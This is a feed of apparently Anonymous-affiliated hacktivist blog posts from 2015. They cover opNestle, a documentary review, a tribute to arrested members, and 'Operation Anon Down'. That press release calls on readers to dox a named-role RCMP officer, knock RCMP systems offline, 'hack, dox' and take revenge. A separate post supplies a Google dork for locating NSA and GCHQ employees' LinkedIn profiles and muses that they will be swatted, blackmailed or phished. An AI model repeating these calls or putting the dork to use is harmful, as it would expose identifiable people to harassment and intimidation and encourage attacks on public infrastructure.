tag:blogger.com,1999:blog-26150120285952025942024-02-19T10:02:03.549+01:00Anonymous PressLgnSec ®Unknownnoreply@blogger.comBlogger236125tag:blogger.com,1999:blog-2615012028595202594.post-34512928666648069442015-09-12T00:20:00.000+02:002015-09-12T00:20:31.412+02:00Anonymous: A Message to the Awakened Ones<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="text-align: left;" trbidi="on">
The Anonymous collective in 2013 had a serious goal when they
initiated the “A message to the awakened ones” project. The project
which was initiated in 2013 is still going strong in 2015. On
21-08-2015, the Youtube user “Anonymous#1867” re-uploaded the Anonymous
video “A message to the awakened ones”.<br />
In this video, the Anonymous collective calls upon everyone which is
collecting and sharing specific information in their private groups. The
Anonymous collective claims that everyone should start sharing the
information which they posses as it will serve a greater goal.<br />
<br />
You can watch the reuploaded Anonymous video below.</div>
<iframe allowfullscreen="" frameborder="0" height="315" src="https://www.youtube.com/embed/HVrshdlsjyM" width="620"></iframe><br />
<div style="text-align: center;">
via http://cyberwarzone.com/</div>
</div>
<div class="blogger-post-footer">This work is licensed under a Creative Commons Attribution-NonCommercial-ShareAlike 3.0 Unported License.
Signed, Anonymous LgnSec
Copyright © 1994-2018 LegionNET Inc, Inc. SOME RIGHTS RESERVED.
LegionNET Inc ® is a registered trademark of LegionNET, Inc. @Moon
</div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2615012028595202594.post-39243426992910069342015-09-12T00:16:00.003+02:002015-09-12T00:24:47.142+02:00Anonymous opNestle will hit Nestle on the 5th of September<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="text-align: left;" trbidi="on">
he Anonymous collective has intiated a new operation which they have
titled “opNestle”. The ‘opNestle’ operation will target the Nestle
company globally, but from the information which we have seen, we can
claim that the <a href="http://nl.eventhint.com/evenementen/562978/anonymous-operation-nestle-street-action-opnestle" target="_blank">Anonymous collective in The Netherlands</a> will target the Nestle company which is located in Amstelveen.<br />
<br />
The Anonymous opNestle collective is active on the Anonymous Operation Nestle Facebook group. The group currently holds <a href="https://www.facebook.com/groups/1602850273306072/" target="_blank">2523 members</a>.</div>
<iframe allowfullscreen="" frameborder="0" height="315" src="https://www.youtube.com/embed/_BmTZfo45yY" width="560"></iframe><br />
<div style="text-align: center;">
via http://cyberwarzone.com/<br />
<br />
<h1 class="single-title">
The Dark Side Of Chocolate – The Documentary Nestle Refused To Watch</h1>
When Nestle refused to watch this documentary (original title: “<a href="http://www.shady-chocolate.com/en" target="_blank">Shady Chocolate</a>“) about the <a href="http://www.foodispower.org/slavery-chocolate/" target="_blank">exploitation of African children in the cocoa industry</a>, the documentary’s director,<a href="http://www.shady-chocolate.com/en/miki-mistrati" target="_blank"> Miki Mistrati</a>, set up a giant screen next to Nestle’s headquarters in Switzerland and played it there.</div>
</div>
<iframe allowfullscreen="" frameborder="0" height="315" src="https://www.youtube.com/embed/7Vfbv6hNeng" width="560"></iframe><br />
<div style="text-align: center;">
via http://anonhq.com</div>
</div>
<div class="blogger-post-footer">This work is licensed under a Creative Commons Attribution-NonCommercial-ShareAlike 3.0 Unported License.
Signed, Anonymous LgnSec
Copyright © 1994-2018 LegionNET Inc, Inc. SOME RIGHTS RESERVED.
LegionNET Inc ® is a registered trademark of LegionNET, Inc. @Moon
</div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2615012028595202594.post-16083525467274753112015-08-08T17:57:00.000+02:002015-08-08T17:57:19.087+02:00How to Watch the Watchers #NSA #GCHQ <div dir="ltr" style="text-align: left;" trbidi="on">
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgikdhPkH1IivHOCd-UrKcitEmST9Ro0Hi93_Dn0mYVatcfY4nnZ6JbKqM7GxOXkoJCSC_zmkKSDYKa9wTrv3V10nsNZMAzw6qguS1_X9jTRb3lKbrV6-mfmyF_IR2vNVweQ9dHQwcQN9E/s1600/FYNG.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="138" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgikdhPkH1IivHOCd-UrKcitEmST9Ro0Hi93_Dn0mYVatcfY4nnZ6JbKqM7GxOXkoJCSC_zmkKSDYKa9wTrv3V10nsNZMAzw6qguS1_X9jTRb3lKbrV6-mfmyF_IR2vNVweQ9dHQwcQN9E/s640/FYNG.PNG" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">http://pastebin.com/yvTdhdjd</td></tr>
</tbody></table>
<div class="de1">
#BULLRUN #LONGHAUL #BLUESNORT #GALLANTWAVE #VALIANTSURF #APEX #SPIN9 #TAO #PRISM #TURBINE #TURMOIL #POISENNUT</div>
<div class="de2">
#MALIBU #FOURSCORE #XKeyscore #TUNDRA #TOYGRIPPE #BLEAKINQUIRY #VULCANDEATHGRIP #VULCANMINDMELD #CORALREEF</div>
<div class="de1">
#HAMMERMILL #BRAVENICKEL #HAMMERSTEIN #GENIE #SCHOOLMONTANA #SIERRAMONTANA #STUCCOMONTANA #STRAITBIZARRE</div>
<div class="de2">
#WISTFULTOLL #COTTONMOUTH #TOTEGHOSTLY #DROPOUTJEEP #TURBINE #TURMOIL #WARRIORPRIDE #Regin #QWERTY</div>
<div class="de1">
#VALIDATOR #UNITEDRAKE #QUANTUM #GROK #SALVAGERABBIT #FOGGYBOTTOM #GUMFISH #CAPTIVATEDAUDIENCE #SIGINT</div>
<div class="de2">
</div>
<div class="de1">
\!/ wget --wait=5s <a href="http://www.spiegel.de/media/media-355%7B09..52%7D.pdf">http://www.spiegel.de/media/media-355{09..52}.pdf</a> \!/</div>
<div class="de2">
^Command to download all the recently released NSA DOX!</div>
<div class="de1">
</div>
<div class="de2">
</div>
<div class="de1">
********************** MY Last Paste about spying on NSA via ICWATCH was deleted! ******************************</div>
<div class="de2">
Here is proof my last paste about NSA was forcibly removed without notifying me!</div>
<div class="de1">
http://imgur.com/QE88NDZ</div>
<div class="de2">
<a href="http://postimg.org/image/t91p44rah/">http://postimg.org/image/t91p44rah/</a></div>
<div class="de1">
</div>
<div class="de2">
New Mirrors:</div>
<div class="de1">
<a href="https://ghostbin.com/paste/d4asx">https://ghostbin.com/paste/d4asx</a></div>
<div class="de2">
<a href="http://hastebin.com/monaliwixu.mel">http://hastebin.com/monaliwixu.mel</a><br />
extra <a href="http://pastebin.com/G5FCVKm5">http://pastebin.com/G5FCVKm5</a></div>
<div class="de1">
</div>
<div class="de2">
****************************************************************************************************************</div>
<div class="de1">
</div>
<div class="de2">
</div>
<div class="de1">
</div>
<div class="de2">
Recently a German researcher @Shidash, displayed a program #ICWATCH at a german security conferance @republica. The </div>
<div class="de1">
program dubbed ICWATCH is a searchable database of over 27,000 NSA security contractors. Still in disbelief and</div>
<div class="de2">
not sure how NSA could have such bad OpSec, after all the snowden files leaked to allow employees to list top secret</div>
<div class="de1">
govt program codewords on a social media platform. Furthermore public profiles on Linkedin are indexed by Google </div>
<div class="de2">
making them dork-able! Also there a graph on number of db user stats and even a live graph for correlation and relations</div>
<div class="de1">
of the different departments/companies/govts. You would think after over half their programs were exposed by Snowden </div>
<div class="de2">
docs they would have made employees remove codewords from profiles creds or at least make them private but no... the arrogance </div>
<div class="de1">
and OpSec failz continue... so basically we all know who has access to what systems and their clearance levels lol</div>
<div class="de2">
I wouldnt be surprised if these people get swatted, blackmailed or phished real soon... just stating the obv XD</div>
<div class="de1">
Either way this is perfect example of how you can use the watchers tools(google dbs) against them... just proves</div>
<div class="de2">
my point again that people are still the main vuln in any networks opsec lol</div>
<div class="de1">
</div>
<div class="de2">
+Here is the dork to find NSA/GCHQ Linkedin profiles with top secret surveillance programs as credentials:</div>
<div class="de1">
(change the key words to different programs listed at top)</div>
<div class="de2">
site:linkedin.com/pub xkeyscore SIGINT</div>
<div class="de1">
</div>
<div class="de2">
+Video of the security talk:</div>
<iframe allowfullscreen="" frameborder="0" height="315" src="https://www.youtube.com/embed/xipI-0HU010" width="560"></iframe>
<div class="de1">
https://www.youtube.com/watch?v=xipI-0HU010</div>
<div class="de1">
<br /></div>
<div class="de2">
</div>
<div class="de1">
+Malicious Sites used to infect users with NSA FiveEyes Malware! #EquationGroup</div>
<div class="de2">
<a href="http://pastebin.com/gzLZm8FA">http://pastebin.com/gzLZm8FA</a></div>
<div class="de1">
</div>
<div class="de2">
+Different type of crypto to avoid these spy programs</div>
<div class="de1">
<a href="http://pastebin.com/xHdJQLUQ">http://pastebin.com/xHdJQLUQ</a></div>
<div class="de2">
<a href="http://prism-break.org/en/">prism-break.org/en/ </a></div>
<div class="de1">
</div>
<div class="de2">
</div>
<div class="de1">
</div>
<div class="de2">
[+] Source [+]</div>
<div class="de1">
<a href="http://transparencytoolkit.org/">transparencytoolkit.org</a></div>
<div class="de2">
<a href="https://www.youtube.com/watch?v=xipI-0HU010">https://www.youtube.com/watch?v=xipI-0HU010</a></div>
<div class="de1">
<a href="http://rt.com/usa/256285-republica-mcgrath-icwatch-database/">http://rt.com/usa/256285-republica-mcgrath-icwatch-database/</a></div>
<div class="de2">
<a href="http://twitter.com/TransparencyKit">http://twitter.com/TransparencyKit</a></div>
<div class="de1">
<a href="http://twitter.com/shidash">http://twitter.com/shidash</a></div>
<div class="de2">
<a href="http://twitter.com/ageis">http://twitter.com/ageis</a></div>
<div class="de1">
<a href="http://pastebin.com/gzLZm8FA">http://pastebin.com/gzLZm8FA</a></div>
<div class="de2">
<a href="http://pastebin.com/FXYZuPXG">http://pastebin.com/FXYZuPXG</a></div>
<div class="de1">
<a href="http://pastebin.com/xHdJQLUQ">http://pastebin.com/xHdJQLUQ</a></div>
<a href="http://prism-break.org/en/">prism-break.org/en/</a></div>
<div class="blogger-post-footer">This work is licensed under a Creative Commons Attribution-NonCommercial-ShareAlike 3.0 Unported License.
Signed, Anonymous LgnSec
Copyright © 1994-2018 LegionNET Inc, Inc. SOME RIGHTS RESERVED.
LegionNET Inc ® is a registered trademark of LegionNET, Inc. @Moon
</div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2615012028595202594.post-30433854343449369422015-07-19T18:28:00.001+02:002015-07-21T19:17:30.913+02:00Anonymous Operation AnonDown: Cops Kill Man in Guy Fawkes Mask, Anonymous Vows to “Avenge” the Police Killing #OpAnonDown #AnonFamily <div dir="ltr" style="text-align: left;" trbidi="on">
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBt9-GEWIym3RzMd1K67JdfVT-1etH-pPOQA7MosijDMKEZE1h8EFfFa45Q0vzsA7P-_xcUQ7bSavq8yWs6mEtSVgMIwyrnhKe1eapRHunihCJaaP0uvIYjcJrCZKdXEuaD3nyRj90usPY/s1600/457661412_1280x720-702x336.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="305" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBt9-GEWIym3RzMd1K67JdfVT-1etH-pPOQA7MosijDMKEZE1h8EFfFa45Q0vzsA7P-_xcUQ7bSavq8yWs6mEtSVgMIwyrnhKe1eapRHunihCJaaP0uvIYjcJrCZKdXEuaD3nyRj90usPY/s640/457661412_1280x720-702x336.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"> #OpAnonDown</td></tr>
</tbody></table>
<h1 class="yt watch-title-container">
<center>
<img src="http://anonymousglobal.org/opanondown/images/AnonDown.png" /></center>
<br /><br />
<center>
<span style="color: red;">Anonymous Operation Anon Down</span></center>
<br /><br />
<center>
<span style="color: #009900; font-size: x-large;">www.OperationAnonDown.cf</span></center>
</h1>
<div style="text-align: center;">
<iframe allowfullscreen="" frameborder="0" height="315" src="https://www.youtube.com/embed/cpR33WANxSU" width="420"></iframe>
<br />
<br />
more new video sources here<br />
<a href="https://www.youtube.com/playlist?list=PLIydBITtSYTU8wyRNGH1cKQD0cL32jtJI">https://www.youtube.com/playlist?list=PLIydBITtSYTU8wyRNGH1cKQD0cL32jtJI</a></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><img src="http://anonymousglobal.org/opanondown/images/anondownbanner.png" style="margin-left: auto; margin-right: auto;" /></td></tr>
<tr><td class="tr-caption" style="text-align: center;">#AnonFamily </td></tr>
</tbody></table>
Anonymous Press Release: Operation Anon Down<br />
Saturday - July 18, 2015 4:00 PM ET At approximately 6:30 PM PT on July 17, 2015 at an Anonymous protest in Dawson Creek, British Columbia which the RCMP was informed about in advance, an RCMP officer mercilessly shot and killed a masked Anon without provocation or cause. The situation should have been handled according to Treaty 8 protocols. And, if Canadian police were as brave as Canadian nurses, they could deal with people with knives without hiding behind bullets. This is the fourth Anon to be slain by security forces around the world in as many years. Turkey, Egypt, Palestine and now British Columbia in Canada. As in the past, Anonymous will not stand idly by while our own are cut down in mask. Anonymous has fought for the lives of protesters all over the globe, from Tahir Square in Egypt to Ferguson, Missouri. We will most certainly avenge one of our own when they are cut down in the streets while protesting the earth wrecking environmental policies of the Canadian government.<br />
<br />
To this end Anonymous announces the launch of Operation Anon Down. The focus of this Op going forward will be gaining justice (and vengeance if necessary) for our fallen comrade in Dawson Creek. But we will also memorialize our previously slain brethren, and prepare to take action for future Anons killed by police - as we have no doubt they will cut down more of us.<br />
<br />
To begin we will identify the RCMP officer involved, thoroughly dox him - and release that dox on the Internet. Because the world has a right to know every detail about killer cops. We will offer support and raise funds if necessary to cover the burial expenses of our fallen comrade. He will be buried with the honor and dignity that his courage has earned him. We will ensure that he is never forgotten, and takes his place in the growing ledger of brave Anonymous martyrs around the world. Then we will press the RCMP and Canadian government for justice. This RCMP officer must be named, fired, and charged - for the murder of our brother Anon. And if we do not receive justice, rest assured there will be revenge.<br />
<br />
We call upon our fellow Anons in Canada to take to the streets and protest at the RCMP headquarters in every Province, every day - until our demands for justice are met. We call upon the Global Collective of Anonymous and allied crews to remove the RCMP cyber infrastructure from the Internet. March, create and sign petitions, hack, dox. We may not be able to bring back our fallen comrade, we may not even be able to prevent other Anons from being slain by murderous police - but we can sure as hell show them that there will be a steep price to pay when they kill us.<br />
<br />
<br />
<br />
<br />
"Behind this mask there is more than flesh and blood<br />
Behind this mask is an idea<br />
<br />
<br />
<br />
<br />
And ideas are bullet proof"<br />
We Are Anonymous<br />
We Are LegionWe Are Everywhere<br />
We Do Not Forgive<br />
We Do Not Forget<br />
To the murderous officers of the RCMP...it is to late to Expect Us<br />
<br />
<center>
<span style="font-size: large;"><b> Operation Anon Down Twitter - <a href="http://twitter.com/OpAnonDown" target="new">FOLLOW HERE</a>
<br /><br />
Op E-Mail Address - <a href="mailto:AnonymousGlobal@riseup.net">AnonymousGlobal@riseup.net</a>
<br /><br />
Anonymous Care Package - <a href="https://mega.co.nz/#%21v54EzCjb%21C5Jqj-y5V5-Z_SrhcfW2QEXbfy351ZNrSO8otP1YKZo" target="blank">DOWNLOAD NOW</a>
<br /><br />
Press Release <a href="http://pastebin.com/5BhcTiaa" target="new">READ HERE</a>
<br /><br />
Operational Information <a href="http://anonymousglobal.org/opanondown/OpAnonDown.html" target="blank">CLICK HERE</a>
</b></span></center>
<br />
<br />
<center>
<img src="http://anonymousglobal.org/opanondown/images/AnonDown.jpg" /></center>
<center>
<img src="http://anonymousglobal.org/opanondown/images/twitter.jpg" /></center>
<br />
<br />
<br />
<center>
<a href="http://www.anonymousglobal.org/" target="blank"><img src="http://anonymousglobal.org/opanondown/images/AnonymousSeal2.png" /></a></center>
________________________________________________________________________________<br />
<iframe allowfullscreen="" frameborder="0" height="315" src="https://www.youtube.com/embed/4nf_WtUHRc8" width="420"></iframe>
<br />
<div style="text-align: center;">
<br /></div>
A man wearing an Anonymous mask was killed by Royal Canadian Mounted
Police (RCMP) outside of a Dawson Creek restaurant last night. Since
then, the hacking collective took to Twitter vowing to avenge their
fallen Anon with the launch of #OpAnonDown.<br />
<br />
In a tweet later deleted, the hacktivist group made it be known that they would respond to the killing of their comrade.<br />
<br />
Like we will not fight back, like we will not avenge our fallen. #AnonLivesMatter Fucking Expect Us.<br />
— Anonymous (@YourAnonNews) July 18, 2015<br />
<br />
The
man killed by police was initially misidentified by police
investigators as being related to a disturbance call inside of a public
hearing, but police later admitted that these incidents were in no way
related to one another.<br />
<br />
This initial misinformation has led to accusations from Anonymous that police are in the initial phases of a cover up.<br />
<br />
In
a video appearing on Facebook, two officers are seen standing over a
man with their guns drawn as the man lay on the ground, wearing a Guy
Fawkes mask and a grey hoodie.<br />
<br />
<br />
Police claim the man refused
to drop a pocket knife. In the video, the officer appears to kick
something away from the man’s body, although no object can be readily
seen. In typical police fashion, officers can be seen handcuffing the
victims body as he lay in a pool of blood.<br />
<br />
According to a report by The Province:<br />
<br />
Kellie
Kilpatrick, spokeswoman for the police watchdog, the Independent
Investigations Office, issued a clarification Friday night, saying that
two men, not one as was initially reported, were involved in the
incident that happened as a public hearing for the contentious Site C
dam was taking place.<br />
<br />
“Police arrive at the location and they
come into contact with a second individual who is unrelated to the
original complaint,” she said. “He is aggressive. He does not follow
police commands and he is shot. He is transported to hospital but he
does not survive.”<br />
<br />
When asked by a reporter from The Province how
this misidentification happened, Kilpatrick stated, “At this point I
don’t have that information.”<br />
<br />
She refused to name the victim or the name of the officers involved in the killing.</div>
<div class="blogger-post-footer">This work is licensed under a Creative Commons Attribution-NonCommercial-ShareAlike 3.0 Unported License.
Signed, Anonymous LgnSec
Copyright © 1994-2018 LegionNET Inc, Inc. SOME RIGHTS RESERVED.
LegionNET Inc ® is a registered trademark of LegionNET, Inc. @Moon
</div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2615012028595202594.post-74104823095194100872015-07-19T17:26:00.002+02:002015-07-19T17:26:45.607+02:00Anonymous Press Release: Operation Anon Down<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="de1">
Anonymous Press Release: Operation Anon Down</div>
<div class="de2">
</div>
<div class="de1">
Saturday - July 18, 2015 4:00 PM ET</div>
<div class="de2">
</div>
<div class="de1">
At approximately 6:30 PM PT on July 17, 2015 at an Anonymous protest in Dawson Creek, British Columbia which the RCMP was informed about in advance, an RCMP officer mercilessly shot and killed a masked Anon without provocation or cause. This is the fourth Anon to be slain by security forces around the world in as many years. Turkey, Egypt, Palestine and now British Columbia in Canada. As in the past, Anonymous will not stand idly by while our own are cut down in mask. Anonymous has fought for the lives of protesters all over the globe, from Tahir Square in Egypt to Ferguson, Missouri. We will most certainly avenge one of our own when they are cut down in the streets while protesting the earth wrecking environmental policies of the Canadian government.</div>
<div class="de2">
</div>
<div class="de1">
To this end Anonymous announces the launch of Operation Anon Down. The focus of this Op going forward will be gaining justice (and vengeance if necessary) for our fallen comrade in Dawson Creek. But we will also memorialize our previously slain brethren, and prepare to take action for future Anons killed by police - as we have no doubt they will cut down more of us.</div>
<div class="de2">
</div>
<div class="de1">
To begin we will identify the RCMP officer involved, thoroughly dox him - and release that dox on the Internet. Because the world has a right to know every detail about killer cops. We will offer support and raise funds if necessary to cover the burial expenses of our fallen comrade. He will be buried with the honor and dignity that his courage has earned him. We will ensure that he is never forgotten, and takes his place in the growing ledger of brave Anonymous martyrs around the world. Then we will press the RCMP and Canadian government for justice. This RCMP officer must be named, fired, and charged - for the murder of our brother Anon. And if we do not receive justice, rest assured there will be revenge.</div>
<div class="de2">
</div>
<div class="de1">
We call upon our fellow Anons in Canada to take to the streets and protest at the RCMP headquarters in every Province, every day - until our demands for justice are met. We call upon the Global Collective of Anonymous and allied crews to remove the RCMP cyber infrastructure from the Internet. March, create and sign petitions, hack, dox. We may not be able to bring back our fallen comrade, we may not even be able to prevent other Anons from being slain by murderous police - but we can sure as hell show them that there will be a steep price to pay when they kill us.</div>
<div class="de2">
</div>
<div class="de1">
"Behind this mask there is more than flesh and blood</div>
<div class="de2">
Behind this mask is an idea</div>
<div class="de1">
And ideas are bullet proof"</div>
<div class="de2">
</div>
<div class="de1">
We Are Anonymous</div>
<div class="de2">
</div>
<div class="de1">
We Are Legion</div>
<div class="de2">
</div>
<div class="de1">
We Are Everywhere</div>
<div class="de2">
</div>
<div class="de1">
We Do Not Forgive</div>
<div class="de2">
</div>
<div class="de1">
We Do Not Forget</div>
<div class="de2">
</div>
<div class="de1">
To the murderous officers of the RCMP...it is to late to Expect Us</div>
<div class="de2">
</div>
<div class="de1">
------------------------------------------------------------------</div>
<div class="de2">
</div>
<div class="de1">
Website - www.OperationAnonDown.cf</div>
<div class="de2">
</div>
Twitter - @OpAnonDown</div>
<div class="blogger-post-footer">This work is licensed under a Creative Commons Attribution-NonCommercial-ShareAlike 3.0 Unported License.
Signed, Anonymous LgnSec
Copyright © 1994-2018 LegionNET Inc, Inc. SOME RIGHTS RESERVED.
LegionNET Inc ® is a registered trademark of LegionNET, Inc. @Moon
</div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2615012028595202594.post-57406042830804136592015-07-16T22:04:00.001+02:002015-07-19T17:21:46.205+02:00Documentary "Going Clear: Scientology and the Prison of Belief" by Alex Gibney (2015 HBO)<div dir="ltr" style="text-align: left;" trbidi="on">
Documentary "Going Clear: Scientology and the Prison of Belief" by Alex Gibney subtitled in Castilian (2015 HBO)<br />
<br />
By Petete "Argie" Anon Anonymous Argentina<br />
<br />
<a href="https://youtu.be/g1opSBNzDo4">Documentary "Going Clear: Scientology and the Prison of Belief" by Alex Gibney subtitled in Castilian (2015 HBO)</a><br />
Click on the link above to see it on Youtube (and that the insertion sites is disabled on the video source)<br />
or try this one<br />
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen="" class="YOUTUBE-iframe-video" data-thumbnail-src="https://i.ytimg.com/vi/UYTbWrEBHiQ/0.jpg" frameborder="0" height="266" src="https://www.youtube.com/embed/UYTbWrEBHiQ?feature=player_embedded" width="320"></iframe></div>
<br />
We are pleased to see someone beat us to present this documentary online brand produced by HBO with subtitles in Castilian. Anyway we are working on our own version, should disappear from Youtube.<br />
<br />
This is the documentary about the cult "Church of Scientology" (Scientology) the talented Alex Gibney (responsible inter alia documentary about Wikileaks and its founder Armand Assange, child abuse in the Catholic Church and the collapse of the Enron Corporation) . It premiered in a select number of theaters on March 13, 2015 and aired on HBO on March 29, 2015. It was an absolute success rating by mid April and had seen half people 5 million, becoming the second most watched HBO documentary of the decade.<br />
<br />
The documentary is based on the <a href="http://anonymousdeargentina.blogspot.com.ar/2014/03/libro-cienciologia-hollywood-y-la.html">book by award-winning journalist Lawrence Wright</a> as it covers from the beginnings of L. Ron Hubbard to present Scientology David Miscavige, with an excellent level of detail in the research, in addition to the testimonies many ex-cult members, journalists and specialists on the subject.<br />
<br />
Consider in detail the beginnings of Hubbard in black magic, his psychiatric problems and family, and touch issues like dirty operations so characteristic of the sect as "Operation Freakout" -destinada going crazy and imprison the journalist Paulette Cooper in retaliation for written the book "The Scandal of Scientology" - concentration camps Scientology FBI infiltration, the victory of the sect against the IRS, current recruitment campaigns and fund-intensive funds, and we prefer to leave much appreciated instead of giving an innumerable list.<br />
<br />
But it should be mentioned some things that they especially like us, like the story of the relationship between Sylvia "Spanky" Taylor and actor John Travolta Scientology member. "Spanky" Taylor was who attended Travolta within the sect after his acting success, and although it was the guide of the actor within the sect, someone Travolta came to depend more than his agent, from one day to another without explanation the sect wiped out "Spanky" Travolta's life by sending one of their camps. Later, they asked him to organize a special role in the cult of "Fever Saturday Night" (Saturday Night Fever) with the presence of Travolta, who never knew the reason for the disappearance of "Spanky" of his life, and when it was organized, they were not allowed to attend, sending it back to camp. Although Travolta came to know details of the suffering of "Spanky" in Scientology he never spoke about it and remains a member of the sect even after having lost a child due to lack of treatment because of their beliefs and practices; however Travolta's sister was a key figure that allowed "Spanky" after escaping from Scientology.<br />
<br />
Another wonderful detail inédita- documentary is now up to the inclusion of an audio fragment obtained the filming of the documentary <a href="http://anonymousdeargentina.blogspot.com.ar/2011/10/el-menguante-mundo-de-l-ron-hubbard.html">The Shrinking World of L. Ron Hubbard "where the founder of Scientology</a>, L. Ron Hubbard, Scientology abuses within admits. This fragment was recorded off camera, while the cameras were rolling as the interview of the "World in Action" program was being prepared, and although it was not included in the original program, the director Alex Gibney won it after contact with journalist who interviewed Hubbard, who was the first and only journalist (outside the sect) to obtain an interview with the sectarian guru.<br />
<br />
Also very interesting the part where it talks about how Scientology handled by decades the life of Tom Cruise, away from his then-wife Nicole Kidman, pulling the cult leader David Miscavige, getting girlfriends, etc.<br />
<br />
Finally we highlight the performance in this documentary of a new audiovisual interpretation of the story of Xenu, the intergalactic emperor who believe in those who reach the highest levels of Scientology (OT3), which they deny this but too many tests by records obtained in trials of former members who leaked secrets and journalistic investigations levels.<br />
<br />
It is by far one of the best documentaries about Scientology, undoubtedly. And as expected, even before its release, the sect "Iglesiia of Scientology" (Scientology) launched its so characteristic campaigns black propaganda and defamation against the director Alex Gibney, producers, former members and journalists who spoke in the documentary, the network that produced and issued (HBO), and to put pressure on critics who praised it.<br />
<br />
The funny and pathetic, in addition to the campaign itself, it was that she used materials from previous campaigns attack on ex-cult members and journalists who had made media sites that allegedly did not belong to them, or so declared them, though everyone to see the obvious. It seems that in desperation to discredit all those involved in the making of this documentary Scientology did not realize he was bringing out using as their own material that had previously refused out by them or belonged to them.<br />
<br />
They say that the lie has short legs, and there is no evil that lasts forever ...<br />
<br />
In short, an excellent documentary that we strongly recommend.<br />
Published by Petete "Argie" Anon in 5:18 a.m.<br />
<br />
tags: : Alex Gibney, david miscavige, documentales, Going Clear, HBO, IGLESIA DE SCIENTOLOGY, john travolta, l. ron hubbard, Lawrence Wright, Marty Rathbun, mike rinder, paul haggis, scientology, Tom Cruise<br />
<br />
Orignal Post= in spanish<br />
<a href="http://anonymousdeargentina.blogspot.sg/2015/05/documental-going-clear-scientology-y-la.html">http://anonymousdeargentina.blogspot.sg/2015/05/documental-going-clear-scientology-y-la.html</a><br />
<br />
<a href="http://www.hbo.com/documentaries/going-clear#/">http://www.hbo.com/documentaries/going-clear#/</a><br />
<a href="http://www.imdb.com/title/tt4257858/">http://www.imdb.com/title/tt4257858/</a></div>
<div class="blogger-post-footer">This work is licensed under a Creative Commons Attribution-NonCommercial-ShareAlike 3.0 Unported License.
Signed, Anonymous LgnSec
Copyright © 1994-2018 LegionNET Inc, Inc. SOME RIGHTS RESERVED.
LegionNET Inc ® is a registered trademark of LegionNET, Inc. @Moon
</div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2615012028595202594.post-34649015719200114662015-07-13T13:16:00.000+02:002015-07-19T17:22:00.059+02:00#FreeAken #FreeOtherwise<div dir="ltr" style="text-align: left;" trbidi="on">
<h3 class="post-title entry-title" itemprop="name" style="background-color: #141414; color: white; font-family: sans-serif; font-size: 22px; font-stretch: normal; margin: 0px; position: relative;">
<a href="http://operationgreenrights.blogspot.com/2015/05/freeaken-freeotherwise.html" style="color: white; font-stretch: normal; text-decoration: none;">#FreeAken #FreeOtherwise</a></h3>
<div class="post-header" style="background-color: #141414; color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 1.6; margin: 0px 0px 1em;">
<div class="post-header-line-1">
</div>
</div>
<div class="post-body entry-content" id="post-body-9190105521780331162" itemprop="description articleBody" style="background-color: #141414; color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18.2000007629395px; position: relative; width: 646px;">
<div dir="ltr" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8ExJecLDgtFRWYJlpZoeiGWNklizPhDkKfdnTZEntzcOLjs6R_Zid8aLcYUZBMw-pu198RhaquobdFaekjl734Gl8RV9HQgV-zSJhdgte9CPduwQR0SORuXvkdrEqrURG64WJQ4Ud0mo/s1600/image.php.jpeg" imageanchor="1" style="color: #444444; margin-left: 1em; margin-right: 1em; text-decoration: none;"><img border="0" height="254" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8ExJecLDgtFRWYJlpZoeiGWNklizPhDkKfdnTZEntzcOLjs6R_Zid8aLcYUZBMw-pu198RhaquobdFaekjl734Gl8RV9HQgV-zSJhdgte9CPduwQR0SORuXvkdrEqrURG64WJQ4Ud0mo/s320/image.php.jpeg" style="-webkit-box-shadow: rgba(0, 0, 0, 0.2) 0px 0px 0px; background: rgb(34, 34, 34); border-radius: 0px; border: 1px solid transparent; box-shadow: rgba(0, 0, 0, 0.2) 0px 0px 0px; padding: 8px; position: relative;" width="320" /></a></div>
<br />
When an Anon is arrested his identity is revealed as a death. But stronger than death is love .<br />
Our beloved companions are with us, in our hearts. No arrests will take you from us.<br />
Otherwise and Aken, they were and are true anons who fought for the ideal knowing the<br />
consequences they would pay.<br />
All legion feels your loss and we will not allow your efforts to be in vain. There will be revenge for you, brothers.<br />
Finally we want to thank you for everything you have done for us and for the time spent together .<br />
<div style="text-align: center;">
</div>
<div style="text-align: center;">
<b>We will never forget you.<br />We are Anonymous<br />We are a Legion<br />We do not forgive<br />We do not forget<br />Expect us</b></div>
</div>
</div>
<div style="text-align: center;">
http://operationgreenrights.blogspot.com/
</div>
</div>
<div class="blogger-post-footer">This work is licensed under a Creative Commons Attribution-NonCommercial-ShareAlike 3.0 Unported License.
Signed, Anonymous LgnSec
Copyright © 1994-2018 LegionNET Inc, Inc. SOME RIGHTS RESERVED.
